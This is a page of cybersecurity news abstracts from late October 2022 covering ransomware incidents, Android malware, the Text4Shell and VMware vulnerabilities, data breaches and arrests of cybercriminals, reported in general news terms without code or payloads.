Researchers discovered 16 malicious clicker apps in the official Google Play store that were downloaded by 20M+ users. Security researchers at McAfee have discovered 16 malicious clicker apps available in the official Google Play store that were installed...Security Affairs
October 24, 2022 – Attack
Pendragon car dealer refuses $60 million LockBit ransomware demand Full Text
Abstract
Pendragon Group, with more than 200 car dealerships in the U.K., was breached in a cyberattack from the LockBit ransomware gang, who allegedly demanded $60 million to decrypt files and not leak them.BleepingComputer
October 24, 2022 – Malware
Security experts targeted with malicious CVE PoC exploits on GitHub Full Text
Abstract
Researchers discovered thousands of GitHub repositories that offer fake proof-of-concept (PoC) exploits for various flaws used to distribute malware. A team of researchers at the Leiden Institute of Advanced Computer Science (Soufian El Yadmani, Robin...Security Affairs
October 23, 2022 – Phishing
Thousands of GitHub repositories deliver fake PoC exploits with malware Full Text
Abstract
Researchers at the Leiden Institute of Advanced Computer Science found thousands of repositories on GitHub that offer fake proof-of-concept (PoC) exploits for various vulnerabilities, some of them including malware.BleepingComputer
October 23, 2022 – General
Security Affairs newsletter Round 390 Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week, the best security articles from Security Affairs, free for you in your email box. If you also want to receive the free newsletter with the international press, subscribe here. Daixin...Security Affairs
October 23, 2022 – Phishing
Typosquat campaign mimics 27 brands to push Windows, Android malware Full Text
Abstract
A massive, malicious campaign is underway using over 200 typosquatting domains that impersonate twenty-seven brands to trick visitors into downloading various Windows and Android malware.BleepingComputer
October 23, 2022 – Breach
Hackers stole sensitive data from Iran’s atomic energy agency Full Text
Abstract
Iran’s atomic energy agency claims that alleged state-sponsored hackers have compromised its email system. Iran’s atomic energy agency revealed on Sunday that a nation-state actor had access to a subsidiary’s network and free access to its email...Security Affairs
October 23, 2022 – Attack
Wholesale giant METRO confirmed to have suffered a cyberattack Full Text
Abstract
International cash and carry giant METRO suffered IT infrastructure outages this week following a cyberattack. International cash and carry giant METRO was hit by a cyberattack that caused IT infrastructure outages. Metro employs more than 95,000...Security Affairs
October 22, 2022 – Ransomware
LockBit Ransomware - The Most Active Global Threat Full Text
Abstract
LockBit, a RaaS, ranks among the top in the ransomware threat category as it has been causing significant damage through its attack campaigns. Lockbit 3.0 is its latest variant. LockBit has hit 1,157 victims on record (throughout its lifetime), which is way ahead of Conti (900), Hive (192), and Bla ... Read MoreCyware Alerts - Hacker News
October 22, 2022 – Criminals
Remote Control Tools Popular Among Cybercriminals Full Text
Abstract
While remote access tools offer flexible support options to organizations, these tools are increasingly exploited by cybercriminals to target organizations. Remote shell is the most common remote access tool, followed by RATs, Cobalt Strike, and others.Cyware Alerts - Hacker News
October 22, 2022 – Malware
Android adware apps in Google Play downloaded over 20 million times Full Text
Abstract
Security researchers at McAfee have discovered a set of 16 malicious clicker apps that managed to sneak into Google Play, the official app store for Android.BleepingComputer
October 22, 2022 – General
A Worrisome Surge in DeadBolt Ransomware Attacks Full Text
Abstract
A recent study by Group-IB revealed that the DeadBolt ransomware group is targeting NAS devices and asks both the victim and the vendor to pay ransoms of 0.03–0.05 BTC and 10–50 BTC, respectively. A few days ago, the Dutch National Police carried out a targeted operation against the Deadbolt ransom ... Read MoreCyware Alerts - Hacker News
October 22, 2022 – Ransomware
TommyLeaks and SchoolBoys: Two sides of the same ransomware gang Full Text
Abstract
Two new extortion gangs named 'TommyLeaks' and 'SchoolBoys' are targeting companies worldwide. However, there is a catch — they are both the same ransomware gang.BleepingComputer
October 22, 2022 – General
Spikes in Cyberattacks Against Open-Source Repositories Full Text
Abstract
Open source software repositories have been subjected to a 633% year-over-year increase in cyber-attacks. The report states that 1.2 billion vulnerable Java dependencies are still getting downloaded each month, while the new and patched versions are getting ignored by the users.Cyware Alerts - Hacker News
October 22, 2022 – Government
Daixin Team targets health organizations with ransomware, US agencies warn Full Text
Abstract
US government agencies warned that the Daixin Team cybercrime group is actively targeting the U.S. Healthcare and Public Health sector with ransomware. CISA, the FBI, and the Department of Health and Human Services (HHS) warned that the Daixin Team...Security Affairs
October 22, 2022 – Vulnerabilities
Exploited Windows zero-day lets JavaScript files bypass security warnings Full Text
Abstract
A new Windows zero-day allows threat actors to use malicious JavaScript files to bypass Mark-of-the-Web security warnings. Threat actors are already seen using the zero-day bug in ransomware attacks.BleepingComputer
October 22, 2022 – Malware
New Clicker Android Malware Infects 20 Million Users Full Text
Abstract
Google Play Store kicked out 16 malicious apps, with a cumulative download of 20 million, that were propagating the Clicker malware for mobile ad fraud. Researchers highlight that the new Android malware is designed to disrupt the mobile advertising ecosystem. It enables its operators to generate r ... Read MoreCyware Alerts - Hacker News
October 22, 2022 – Vulnerabilities
Threat actors exploit critical flaw in VMware Workspace ONE Access to drop ransomware, miners Full Text
Abstract
Threat actors are exploiting a now-patched vulnerability, tracked as CVE-2022-22954, in VMware Workspace ONE Access in attacks in the wild. Threat actors are actively exploiting a now-patched vulnerability, tracked as CVE-2022-22954, in VMware Workspace...Security Affairs
October 22, 2022 – Vulnerabilities
Critical Flaw Reported in Move Virtual Machine Powering the Aptos Blockchain Network Full Text
Abstract
Researchers have disclosed details about a now-patched critical flaw in the Move virtual machine that powers the Aptos blockchain network. The vulnerability "can cause Aptos nodes to crash and cause denial of service," Singapore-based Numen Cyber Labs said in a technical write-up published earlier this month. Aptos is a new entrant to the blockchain space, which launched its mainnet on October 17, 2022. It has its roots in the Diem stablecoin payment system proposed by Meta (née Facebook), which also introduced a short-lived digital wallet called Novi. The network is built using a platform-agnostic programming language known as Move, a Rust-based system that's designed to implement and execute smart contracts in a secure runtime environment, also known as the Move Virtual Machine (aka MoveVM). The vulnerability identified by Numen Cyber Labs is rooted in the Move language's verification module ("stack_usage_verifier.rs"), a comThe Hacker News
October 21, 2022 – Ransomware
The Week in Ransomware - October 21st 2022 - Stop the Presses Full Text
Abstract
Cybersecurity researchers did not disappoint, with reports linking RansomCartel to REvil, on OldGremlin hackers targeting Russia with ransomware, a new data exfiltration tool used by BlackByte, a warning that ransomware actors are exploiting VMware vulnerabilities, and finally, our own report on the Venus Ransomware.BleepingComputer
October 21, 2022 – General
Password Report: Honeypot Data Shows Bot Attack Trends Against RDP, SSH Full Text
Abstract
The report concludes that the use of long, strong random strings such as those generated by password managers and not likely to be included in ‘dictionaries’ would provide a very strong defense against opportunistic bot-driven automated attacks.Security Week
October 21, 2022 – Hacker
What Impact, if Any, Does Killnet Have? Full Text
Abstract
Killnet, the pro-Russian hacktivist collective, launched an ineffective DDoS attack on U.S. government websites earlier this month, leaving many to wonder what the purpose of such groups is and what impact they actually have, especially amid the war in Ukraine.Lawfare
October 21, 2022 – Breach
EnergyAustralia Electricity company discloses security breach Full Text
Abstract
Electricity company EnergyAustralia suffered a security breach, threat actors had access to information on 323 customers. Another Australian organization was hit by a severe cyber attack, this time the victim is the Electricity company EnergyAustralia....Security Affairs
October 21, 2022 – Government
US govt warns of Daixin Team targeting health orgs with ransomware Full Text
Abstract
CISA, the FBI, and the Department of Health and Human Services (HHS) warned that a cybercrime group known as Daixin Team is actively targeting the U.S. Healthcare and Public Health (HPH) sector in ransomware attacks.BleepingComputer
October 21, 2022 – Malware
ERMAC Banking Trojan Targets Hundreds of Android Users Full Text
Abstract
Cyble detected a mass phishing campaign targeting Android users with the ERMAC banking trojan with the latest version of the trojan targeting 467 apps. The threat actor used typosquatted domains of popular Android application hosting platforms such as Google PlayStore, APKPure, and APKCombo.Cyware Alerts - Hacker News
October 21, 2022 – Botnet
Emotet Botnet Distributing Self-Unlocking Password-Protected RAR Files to Drop Malware Full Text
Abstract
The notorious Emotet botnet has been linked to a new wave of malspam campaigns that take advantage of password-protected archive files to drop CoinMiner and Quasar RAT on compromised systems. In an attack chain detected by Trustwave SpiderLabs researchers, an invoice-themed ZIP file lure was found to contain a nested self-extracting (SFX) archive, the first archive acting as a conduit to launch the second. While phishing attacks like these traditionally require persuading the target into opening the attachment, the cybersecurity company said the campaign sidesteps this hurdle by making use of a batch file to automatically supply the password to unlock the payload. The first SFX archive file further makes use of either a PDF or Excel icon to make it appear legitimate, when, in reality, it contains three components: the password-protected second SFX RAR file, the aforementioned batch script which launches the archive, and a decoy PDF or image. "The execution of the batch fThe Hacker News
October 21, 2022 – Vulnerabilities
Experts warn of CVE-2022-42889 Text4Shell exploit attempts Full Text
Abstract
Wordfence researchers warn of exploitation attempts targeting the recently disclosed flaw in Apache Commons Text dubbed Text4Shell. Experts at WordPress security firm Wordfence reported exploitation attempts targeting the recently disclosed flaw...Security Affairs
October 21, 2022 – Outage
Wholesale giant METRO hit by IT outage after cyberattack Full Text
Abstract
International wholesale giant METRO is experiencing infrastructure outages and store payment issues following a recent cyberattack.BleepingComputer
October 21, 2022 – Vulnerabilities
Vulnerabilities in Cisco Identity Services Engine Require Your Attention Full Text
Abstract
There are no workarounds available for the two flaws. And, while there’s currently a fix for CVE-2022-20959 (for one specific ISE version and patch level), other fixes are scheduled to be released in the coming months – some even in January 2023.Help Net Security
October 21, 2022 – Vulnerabilities
Multiple Campaigns Exploit VMware Vulnerability to Deploy Crypto Miners and Ransomware Full Text
Abstract
A now-patched vulnerability in VMware Workspace ONE Access has been observed being exploited to deliver both cryptocurrency miners and ransomware on affected machines. "The attacker intends to utilize a victim's resources as much as possible, not only to install RAR1Ransom for extortion, but also to spread GuardMiner to collect cryptocurrency," Fortinet FortiGuard Labs researcher Cara Lin said in a Thursday report. The issue, tracked as CVE-2022-22954 (CVSS score: 9.8), concerns a remote code execution vulnerability that stems from a case of server-side template injection. Although the shortcoming was addressed by the virtualization services provider in April 2022, it has since come under active exploitation in the wild. Fortinet said it observed in August 2022 attacks that sought to weaponize the flaw to deploy the Mirai botnet on Linux devices as well as RAR1Ransom and GuardMiner, a variant of the XMRig Monero miner. The Mirai sample is retrieved frThe Hacker News
October 21, 2022 – Government
CISA adds Linux kernel flaw CVE-2021-3493 to its Known Exploited Vulnerabilities Catalog Full Text
Abstract
CISA added a Linux kernel vulnerability, tracked as CVE-2021-3493, to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week added a Linux kernel vulnerability, tracked...Security Affairs
October 21, 2022 – Vulnerabilities
Hackers exploit critical VMware flaw to drop ransomware, miners Full Text
Abstract
Security researchers observed malicious campaigns leveraging a critical vulnerability in VMware Workspace One Access to deliver various malware, including the RAR1Ransom tool that locks files in password-protected archives.BleepingComputer
October 21, 2022 – Vulnerabilities
Hackers Started Exploiting Critical “Text4Shell” Apache Commons Text Vulnerability Full Text
Abstract
WordPress security company Wordfence on Thursday said it started detecting exploitation attempts targeting the newly disclosed flaw in Apache Commons Text on October 18, 2022. The vulnerability, tracked as CVE-2022-42889 aka Text4Shell, has been assigned a severity ranking of 9.8 out of a possible 10.0 on the CVSS scale and affects versions 1.5 through 1.9 of the library. It's also similar to the now infamous Log4Shell vulnerability in that the issue is rooted in the manner in which string substitutions carried out during DNS, script, and URL lookups could lead to the execution of arbitrary code on susceptible systems when passing untrusted input. "The attacker can send a crafted payload remotely using 'script,' 'dns,' and 'url' lookups to achieve arbitrary remote code execution," Zscaler ThreatLabZ team explained. A successful exploitation of the flaw can enable a threat actor to open a reverse shell connection with the vulnerable appThe Hacker News
October 21, 2022 – Solution
GUAC – A Google Open Source Project to secure software supply chain Full Text
Abstract
Google launched the Graph for Understanding Artifact Composition (GUAC) project to secure the software supply chain. Google this week launched a new project named Graph for Understanding Artifact Composition (GUAC) which aims at securing the software...Security Affairs
October 21, 2022 – Policy and Law
Clearview AI gets third €20 million fine for illegal data collection Full Text
Abstract
France's data protection authority (CNIL) has fined Clearview AI with €20 million for illegal collection and processing of biometric data belonging to French citizens.BleepingComputer
October 21, 2022 – Government
A Quick Look at the “Strengthening America’s Cybersecurity” Initiative Full Text
Abstract
Acknowledging that you have a problem is the first step to addressing the problem in a serious way. This seems to be the reasoning for the White House recently announcing its "Strengthening America's Cybersecurity" initiative. The text of the announcement contains several statements that anyone who's ever read about cybersecurity will have heard many times over: increasing resilience, greater awareness, countering ransomware attacks – the list goes on. There are some novel aspects to the text as well, including a realization that cybersecurity is not, has never been, and will never be something that can be solved at the nation-state level. The White House also pointed to IoT warning labels as a solution – and reminded us all (and we do need reminding) about the importance of cybersecurity education. Let's take a look. International cooperation is critical A key point that the White House statement makes very clear is that cyberattacks are asymmetric in theThe Hacker News
October 21, 2022 – Malware
New URSNIF variant doesn’t support banking features Full Text
Abstract
A new variant of the popular Ursnif malware is used as a backdoor to deliver next-stage payloads and steal sensitive data. Mandiant researchers warn of a significant shift from Ursnif's original purpose, the malware initially used in banking frauds...Security Affairs
October 21, 2022 – Ransomware
BlackByte ransomware uses new data theft tool for double-extortion Full Text
Abstract
A BlackByte ransomware affiliate is using a new custom data stealing tool called 'ExByte' to steal data from compromised Windows devices quickly.BleepingComputer
October 21, 2022 – Breach
Microsoft Confirms Server Misconfiguration Led to 65,000+ Companies’ Data Leak Full Text
Abstract
Microsoft this week confirmed that it inadvertently exposed information related to thousands of customers following a security lapse that left an endpoint publicly accessible over the internet sans any authentication. "This misconfiguration resulted in the potential for unauthenticated access to some business transaction data corresponding to interactions between Microsoft and prospective customers, such as the planning or potential implementation and provisioning of Microsoft services," Microsoft said in an alert. Microsoft also emphasized that the B2B leak was "caused by an unintentional misconfiguration on an endpoint that is not in use across the Microsoft ecosystem and was not the result of a security vulnerability." The misconfiguration of the Azure Blob Storage was spotted on September 24, 2022, by cybersecurity company SOCRadar, which termed the leak BlueBleed. Microsoft said it's in the process of directly notifying impacted customers. The WinThe Hacker News
October 21, 2022 – Breach
Healthcare system Advocate Aurora Health data breach potentially impacted 3M patients Full Text
Abstract
Healthcare system Advocate Aurora Health (AAH) disclosed a data breach that exposed the personal data of 3,000,000 patients. The US-based hospital healthcare system Advocate Aurora Health (AAH) disclosed a data breach that exposed the personal data...Security Affairs
October 20, 2022 – Malware
Ursnif malware switches from bank account theft to initial access Full Text
Abstract
A new version of the Ursnif malware (a.k.a. Gozi) emerged as a generic backdoor, stripped of its typical banking trojan functionality.BleepingComputer
October 20, 2022 – Business
Health Insurer Pays Out $4.5 Million Over Bungled Data Security Full Text
Abstract
To put the fines in perspective: EyeMed's parent company Luxottica of America reportedly rakes in annual revenues exceeding $500 million. In other words: don't shed too many tears for the insurer over a $4.5 million check.The Register
October 20, 2022 – Solution
Google Launches GUAC Open Source Project to Secure Software Supply Chain Full Text
Abstract
Google on Thursday announced that it's seeking contributors to a new open source initiative called Graph for Understanding Artifact Composition, also known as GUAC, as part of its ongoing efforts to beef up the software supply chain. "GUAC addresses a need created by the burgeoning efforts across the ecosystem to generate software build, security, and dependency metadata," Brandon Lum, Mihai Maruseac, and Isaac Hepworth of Google said in a post shared with The Hacker News. "GUAC is meant to democratize the availability of this security information by making it freely accessible and useful for every organization, not just those with enterprise-scale security and IT funding." The software supply chain has emerged as a lucrative attack vector for threat actors, wherein exploiting just one weakness -- as seen in the case of SolarWinds and Log4Shell -- opens a pathway long enough to traverse down the supply chain and steal sensitive data, plant malware, aThe Hacker News
October 20, 2022 – General
The Emerging Cyber Threat to the American Rail Industry Full Text
Abstract
Adding trains to the Internet of Things opens the door to a new threat: cyberattacks.Lawfare
October 20, 2022 – Malware
Experts spotted a new undetectable PowerShell Backdoor posing as a Windows update Full Text
Abstract
Cybersecurity researchers warn of a new PowerShell backdoor that disguises itself as part of the Windows update process to avoid detection. Cybersecurity researchers from SafeBreach issued a warning about a new PowerShell backdoor masquerading as a Windows update...Security Affairs
October 20, 2022 – Policy and Law
Google sued over biometric data collection without consent Full Text
Abstract
Texas attorney general Ken Paxton has sued Google for allegedly collecting and using biometric data belonging to millions of Texans without proper consent.BleepingComputer
October 20, 2022 – Privacy
Smartphones of Iranian Protesters Targeted with Spyware Full Text
Abstract
Voice of America has obtained a copy of the spyware. In its report, the agency noted that the malware was previously distributed on different forums under titles such as Telegram with Free Internet.Hackread
October 20, 2022 – Ransomware
OldGremlin Ransomware Targeted Over a Dozen Russian Entities in Multi-Million Scheme Full Text
Abstract
A Russian-speaking ransomware group dubbed OldGremlin has been attributed to 16 malicious campaigns aimed at entities operating in the transcontinental Eurasian nation over the course of two and a half years. "The group's victims include companies in sectors such as logistics, industry, insurance, retail, real estate, software development, and banking," Group-IB said in an exhaustive report shared with The Hacker News. "In 2020, the group even targeted an arms manufacturer." In what's a rarity in the ransomware landscape, OldGremlin (aka TinyScouts) is one of the very few financially motivated cybercrime gangs that primarily focuses on Russian companies. Other notable groups consist of Dharma, Crylock, and Thanos, contributing to an uptick in ransomware attacks targeting businesses in the country by over 200% in 2021. OldGremlin first came to light in September 2020 when the Singapore-headquartered cybersecurity company disclosed nine campaigns orchThe Hacker News
October 20, 2022 – Breach
BlueBleed: Microsoft confirmed data leak exposing customers’ info Full Text
Abstract
Microsoft disclosed a data leak: sensitive data of some of its customers was exposed by a misconfigured Microsoft server accessible online. Microsoft announced that sensitive data belonging to some of its customers was exposed on the Internet due to a misconfigured...Security Affairs
October 20, 2022 – Breach
Health system data breach due to Meta Pixel hits 3 million patients Full Text
Abstract
Advocate Aurora Health (AAH), a 26-hospital healthcare system in the states of Wisconsin and Illinois, is notifying its patients of an unintentional data breach that impacts 3,000,000 individuals.BleepingComputer
October 20, 2022 – Outage
Internet Disruptions Observed as Russia Targets Critical Infrastructure in Ukraine Full Text
Abstract
Network data show major sustained impacts to infrastructure across much of Ukraine after a series of reprisal attacks by Russia; energy facilities have been targeted per President’s office.Security Affairs
October 20, 2022 – Malware
Hackers Using New Version of FurBall Android Malware to Spy on Iranian Citizens Full Text
Abstract
The Iranian threat actor known as Domestic Kitten has been attributed to a new mobile campaign that masquerades as a translation app to distribute an updated variant of an Android malware known as FurBall. "Since June 2021, it has been distributed as a translation app via a copycat of an Iranian website that provides translated articles, journals, and books," ESET researcher Lukas Stefanko said in a report shared with The Hacker News. The updates, while retaining the same surveillance functionality as earlier versions, are designed to evade detection by security solutions, the Slovak cybersecurity firm added. Domestic Kitten, also called APT-C-50, is an Iranian threat activity cluster that has been previously identified as targeting individuals of interest with the goal of harvesting sensitive information from compromised mobile devices. It's been known to be active since at least 2016. A tactical analysis conducted by Trend Micro in 2019 revealed Domestic KittenThe Hacker News
October 20, 2022 – Outage
Internet disruptions observed as Russia targets critical infrastructure in Ukraine Full Text
Abstract
While the Russian army is conducting coordinated missile and drone strikes in Ukraine, experts observed Internet disruptions in the country. Starting on the morning of Monday, October 10, the Russian army has been targeting several cities in Ukraine with...Security Affairs
October 20, 2022 – Attack
OldGremlin hackers use Linux ransomware to attack Russian orgs Full Text
Abstract
OldGremlin, one of the few ransomware groups attacking Russian corporate networks, has expanded its toolkit with file-encrypting malware for Linux machines.BleepingComputer
October 20, 2022 – Government
Biden Administration Issues New Cybersecurity Requirements for Rail Operators Full Text
Abstract
The new directive from the Transportation Security Administration requires rail companies to report hacking incidents to the Department of Homeland Security and to have a plan to keep a cybersecurity incident from hampering their operations.CNN Money
October 20, 2022 – Education
Not All Sandboxes Are for Children: How to Secure Your SaaS Sandbox Full Text
Abstract
When creating a Sandbox, the mindset tends to be that the Sandbox is considered a place to play around, test things, and there will be no effect on the production or operational system. Therefore, people don't actively think they need to worry about its security. This mindset is not only wrong, but extremely dangerous. When it comes to software developers, their version of sandbox is similar to a child's playground — a place to build and test without breaking any flows in production. Meanwhile, in the world of cybersecurity, the term 'sandbox' is used to describe a virtual environment or machine used to run suspicious code and other elements. Many organizations use a Sandbox for their SaaS apps — to test changes without disrupting the production SaaS app or even to connect new apps (much like a software developer's Sandbox). This common practice often leads to a false sense of security and in turn a lack of thought for its security implications. This article wiThe Hacker News
October 20, 2022 – Criminals
Brazilian police arrested a man suspected of being a member of LAPSUS$ gang Full Text
Abstract
The Federal Police of Brazil arrested an individual who is suspected of being a member of the notorious LAPSUS$ extortionist group. The Federal Police of Brazil yesterday announced the arrest of an individual suspected of being linked to the LAPSUS$...Security Affairs
October 20, 2022 – Criminals
Cybercriminals jailed for cryptocurrency theft, death threats Full Text
Abstract
On Wednesday, two Massachusetts men were sentenced to more than two years in prison each for stealing cryptocurrency in SIM swapping attacks and hijacking their victims' social media accounts.BleepingComputer
October 20, 2022 – Government
FBI Warning: Beware of Student Loan Forgiveness Scammers Full Text
Abstract
The scam the FBI is warning about involves cybercriminals and fraudsters purporting to provide entrance to the Federal Student Loan Forgiveness program. Fraudsters could contact potential victims via phone, email, text, websites, or chat services.ZDNet
October 20, 2022 – Malware
These 16 Clicker Malware Infected Android Apps Were Downloaded Over 20 Million Times Full Text
Abstract
As many as 16 malicious apps with over 20 million cumulative downloads have been taken down from the Google Play Store after they were caught committing mobile ad fraud. The Clicker malware masqueraded as seemingly harmless utilities like cameras, currency/unit converters, QR code readers, note-taking apps, and dictionaries, among others, in a bid to trick users into downloading them, cybersecurity firm McAfee said. The list of offending apps is as follows: High-Speed Camera (com.hantor.CozyCamera), 10,000,000+ downloads; Smart Task Manager (com.james.SmartTaskManager), 5,000,000+ downloads; Flashlight+ (kr.caramel.flash_plus), 1,000,000+ downloads; 달력메모장 (com.smh.memocalendar), 1,000,000+ downloads; K-Dictionary (com.joysoft.wordBook), 1,000,000+ downloads; BusanBus (com.kmshack.BusanBus), 1,000,000+ downloads; Flashlight+ (com.candlencom.candleprotest), 500,000+ downloads; Quick Note (com.movinapp.quicknote), 500,000+ downloads; Currency Converter (com.smartwho.SmaThe Hacker News
October 20, 2022 – Breach
Experts discovered millions of .git folders exposed to public Full Text
Abstract
Nearly two million .git folders containing vital project information are exposed to the public, the Cybernews research team found. Original Post at https://cybernews.com/security/millions-git-folders-exposed/ Git is the most popular open-source,...Security Affairs
October 20, 2022 – Hacker
Hacking group updates Furball Android spyware to evade detection Full Text
Abstract
A new version of the 'FurBall' Android spyware has been found targeting Iranian citizens in mobile surveillance campaigns conducted by the Domestic Kitten hacking group, also known as APT-C-50.BleepingComputer
October 20, 2022 – Malware
New Ursnif Variant Likely Shifting Focus to Ransomware and Data Theft Full Text
Abstract
The Ursnif malware has become the latest malware to shed its roots as a banking trojan to revamp itself into a generic backdoor capable of delivering next-stage payloads, joining the likes of Emotet, Qakbot, and TrickBot. "This is a significant shift from the malware's original purpose to enable banking fraud, but is consistent with the broader threat landscape," Mandiant researchers Sandor Nemes, Sulian Lebegue, and Jessa Valdez disclosed in a Wednesday analysis. The refreshed and refactored variant, first spotted by the Google-owned threat intelligence firm in the wild on June 23, 2022, has been codenamed LDR4, in what's being seen as an attempt to lay the groundwork for potential ransomware and data theft extortion operations. Ursnif, also called Gozi or ISFB, is one of the oldest banker malware families, with the earliest documented attacks going as far back as 2007. Check Point, in August 2020, mapped the "divergent evolution of Gozi" over thThe Hacker News
October 20, 2022 – Criminals
Brazilian Police Arrest Suspected Member of Lapsus$ Hacking Group Full Text
Abstract
The Federal Police of Brazil on Wednesday announced it had arrested an individual for purported links to the notorious LAPSUS$ extortionist gang. The arrest was made as part of a new law enforcement effort, dubbed Operation Dark Cloud, that was launched in August 2022, the agency noted. Not much is known about the suspect other than the fact that the person could be a teenager. The Polícia Federal said it commenced its investigation in December 2021 following an attack on websites under Brazil's Ministry of Health, resulting in the alleged exfiltration of 50TB of data and temporary unavailability of COVID-19 vaccination data of millions of citizens. Other federal government portals targeted by the LAPSUS$ group in Brazil include the Ministry of Economy, Comptroller General of the Union, and the Federal Highway Police. "The crimes determined in the police investigation are those of criminal organization, invasion of a computer device, interruption or disturbance of teThe Hacker News
October 19, 2022 – Policy and Law
Brazil arrests suspect believed to be a Lapsus$ gang member Full Text
Abstract
Today, the Brazilian Federal Police arrested a Brazilian suspect in the city of Feira de Santana, Bahia, believed to be part of the Lapsus$ extortion gang.BleepingComputer
October 19, 2022 – Criminals
Brazil arrests suspect linked to the Lapsus$ hacking group Full Text
Abstract
Today, the Brazilian Federal Police arrested a Brazilian suspect in the city of Feira de Santana, Bahia, believed to be part of the Lapsus$ extortion gang.BleepingComputer
October 19, 2022 – General
Cyber Talent Still in High Demand Full Text
Abstract
The cyber workforce count for the most recent 12-month period is over 1.1 million. For the public sector in particular, 47,114 cyber jobs were listed and 72,599 workers were employed.Nextgov
October 19, 2022 – Vulnerabilities
Researchers Detail Azure SFX Flaw That Could’ve Allowed Attackers to Gain Admin Access Full Text
Abstract
Cybersecurity researchers have shared more details about a now-patched security flaw in Azure Service Fabric Explorer (SFX) that could potentially enable an attacker to gain administrator privileges on the cluster. The vulnerability, tracked as CVE-2022-35829, carries a CVSS severity rating of 6.2 and was addressed by Microsoft as part of its Patch Tuesday updates last week. Orca Security, which discovered and reported the flaw to the tech giant on August 11, 2022, dubbed the vulnerability FabriXss (pronounced "fabrics"). It impacts Azure Fabric Explorer version 8.1.316 and prior. SFX is described by Microsoft as an open-source tool for inspecting and managing Azure Service Fabric clusters, a distributed systems platform that's used to build and deploy microservices-based cloud applications. The vulnerability is rooted in the fact that a user with permissions to "Create Compose Application" through the SFX client can leverage the privilegesThe Hacker News
October 19, 2022 – Policy and Law
The Fallout From the First Trial of a Corporate Executive for ‘Covering Up’ a Data Breach Full Text
Abstract
The Justice Department should issue guidance to clarify the line between covering up a data breach and merely declining to disclose it.Lawfare
October 19, 2022 – Vulnerabilities
Text4Shell, a remote code execution bug in Apache Commons Text library Full Text
Abstract
A researcher discovered a remote code execution vulnerability in the open-source Apache Commons Text library. GitHub's threat analyst Alvaro Munoz discovered a remote code execution vulnerability, tracked as CVE-2022-42889, in the open-source Apache...Security Affairs
October 19, 2022 – Breach
Microsoft data breach exposes customers’ contact info, emails Full Text
Abstract
Microsoft said today that some of its customers' sensitive information was exposed by a misconfigured Microsoft server accessible over the Internet.BleepingComputer
October 19, 2022 – Solution
Google Unveils KataOS ‘Verifiably-Secure’ Operating System for Embedded Devices Full Text
Abstract
The project is named Sparrow and it revolves around a new operating system named KataOS, for which Google has already open-sourced several components. The tech giant pointed out that KataOS is mostly developed in Rust, which makes it more secure.Security Week
October 19, 2022 – Attack
Chinese Hackers Targeting Online Casinos with GamePlayerFramework Malware Full Text
Abstract
An advanced persistent threat (APT) group of Chinese origin codenamed DiceyF has been linked to a string of attacks aimed at online casinos in Southeast Asia for years. Russian cybersecurity company Kaspersky said the activity aligns with another set of intrusions attributed to Earth Berberoka (aka GamblingPuppet) and DRBControl, citing tactical and targeting similarities as well as the abuse of secure messaging clients. "Possibly we have a mix of espionage and [intellectual property] theft, but the true motivations remain a mystery," researchers Kurt Baumgartner and Georgy Kucherin said in a technical write-up published this week. The starting point of the investigation was in November 2021 when Kaspersky said it detected multiple PlugX loaders and other payloads that were deployed via an employee monitoring service and a security package deployment service. The initial infection method – the distribution of the framework through security solution packagesThe Hacker News
October 19, 2022 – Vulnerabilities
Researchers share details of FabriXss bug impacting Azure Fabric Explorer Full Text
Abstract
Cybersecurity researchers published technical details about a now-patched FabriXss flaw that impacts Azure Fabric Explorer. Orca Security researchers have released technical details about a now-patched FabriXss vulnerability, tracked as CVE-2022-35829...Security Affairs
October 19, 2022 – Solution
Microsoft announces enterprise DDoS protection for SMBs Full Text
Abstract
Microsoft announced today the availability of Azure DDoS IP Protection in public preview, a new and fully managed DDoS Protection pay-per-protected IP model offering tailored to small and midsize businesses (SMBs).BleepingComputer
October 19, 2022 – Breach
Online Wine Retailer iDealwine Suffered a Data Breach Full Text
Abstract
It has informed its customers that their name, address, telephone number and email address may have been compromised. Customers' credit card/bank information has not been compromised, since it’s not stored on company servers.Help Net Security
October 19, 2022 – Education
A Quick Guide for Small Cybersecurity Teams Looking to Invest in Cyber Insurance Full Text
Abstract
In the world of insurance providers and policies, cyber insurance is a fairly new field. And many security teams are trying to wrap their heads around it. What is it and do they need it? And how much time will they spend researching how to integrate cyber insurance into their strategy? For small security teams, this is particularly challenging as they contend with limited resources. Luckily, there's a new eBook dedicated to helping small security teams better understand cyber insurance policies and how they may impact an organization's cybersecurity measures. Background: In 1997, the "Internet Security Liability" (ISL) insurance policy was launched at the International Risk Insurance Management Society's convention in Honolulu. Underwritten by AIG, ISL insurance was designed to protect ecommerce retailers like Amazon that were collecting sensitive customer data and storing it on internal networks. It is credited as one of the very first cyber insurance policies to be made avaThe Hacker News
October 19, 2022 – Criminals
The missed link between Ransom Cartel and REvil ransomware gangs Full Text
Abstract
Researchers at Palo Alto Networks' Unit 42 linked the Ransom Cartel ransomware operation to the REvil ransomware operations. Researchers at Palo Alto Networks' Unit 42 have linked the relatively new Ransom Cartel ransomware operation with the notorious...Security Affairs
October 19, 2022 – Attack
Hackers use new stealthy PowerShell backdoor to target 60+ victims Full Text
Abstract
A previously undocumented, fully undetectable PowerShell backdoor is being actively used by a threat actor who has targeted at least 69 entities.BleepingComputer
October 19, 2022 – Breach
LockBit Claims 1.4TB of Data Theft from U.K Insurance Firm Full Text
Abstract
The IT team blocked all external access and affected servers were brought offline as soon as the cyberattack became known, but the investigation concluded that business operations have not been impacted.Heimdal Security
October 19, 2022 – Vulnerabilities
Experts Warn of Stealthy PowerShell Backdoor Disguising as Windows Update Full Text
Abstract
Details have emerged about a previously undocumented and fully undetectable (FUD) PowerShell backdoor that gains its stealth by disguising itself as part of a Windows update process. "The covert self-developed tool and the associated C2 commands seem to be the work of a sophisticated, unknown threat actor who has targeted approximately 100 victims," Tomer Bar, director of security research at SafeBreach, said in a new report. Attributed to an unnamed threat actor, attack chains involving the malware commence with a weaponized Microsoft Word document that, per the company, was uploaded from Jordan on August 25, 2022. Metadata associated with the lure document indicates that the initial intrusion vector is a LinkedIn-based spear-phishing attack, which ultimately leads to the execution of a PowerShell script via a piece of embedded macro code. The PowerShell script (Script1.ps1) is designed to connect to a remote command-and-control (C2) server and retrieve a commThe Hacker News
October 19, 2022 – Vulnerabilities
Microsoft Azure SFX bug let hackers hijack Service Fabric clusters Full Text
Abstract
